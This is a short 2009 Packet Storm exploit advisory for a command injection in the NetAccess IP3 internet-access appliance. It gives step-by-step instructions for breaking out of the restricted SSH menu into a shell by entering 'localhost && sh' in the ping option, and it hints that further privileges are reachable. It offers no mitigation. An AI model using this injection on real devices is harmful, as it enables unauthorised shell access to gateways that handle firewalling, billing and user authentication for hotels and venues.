NetAccess IP3 Command Injection

2009-09-16T00:00:00
ID PACKETSTORM:81328
Type packetstorm
Reporter r00t
Modified 2009-09-16T00:00:00

Description

                                        
                                            `###############################################################  
#NetAccess IP3 - Force into shell  
#By: r00t  
#Shouts: G., Tee, ES, s1ngl3, and D1g1t5  
#  
###############################################################  
#Requirements: Remote access to an IP3  
# Any level control panel username/password  
#  
###############################################################  
#Vendor Information:  
#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com)  
#for including vendor information in his AFD vuln  
#  
#"IP3's NetAccess is a device created for high demand environments such as  
#convention centers or hotels. It handles the Internet access and  
#provides for instance firewalling, billing, rate-limiting as well as  
#various authentication mechanisms. The device is administrated via SSH  
#or a web-based GUI."  
#  
###############################################################  
  
1. SSH into the IP3's IP address  
2. After logging in, select the "ping" option (usually menu item 5)  
3. Ping the address: localhost && sh  
4. After four pings to localhost, shell will be forced open  
  
One may think there are limitations once logged into shell without  
root access on an IP3. Wrong.  
  
`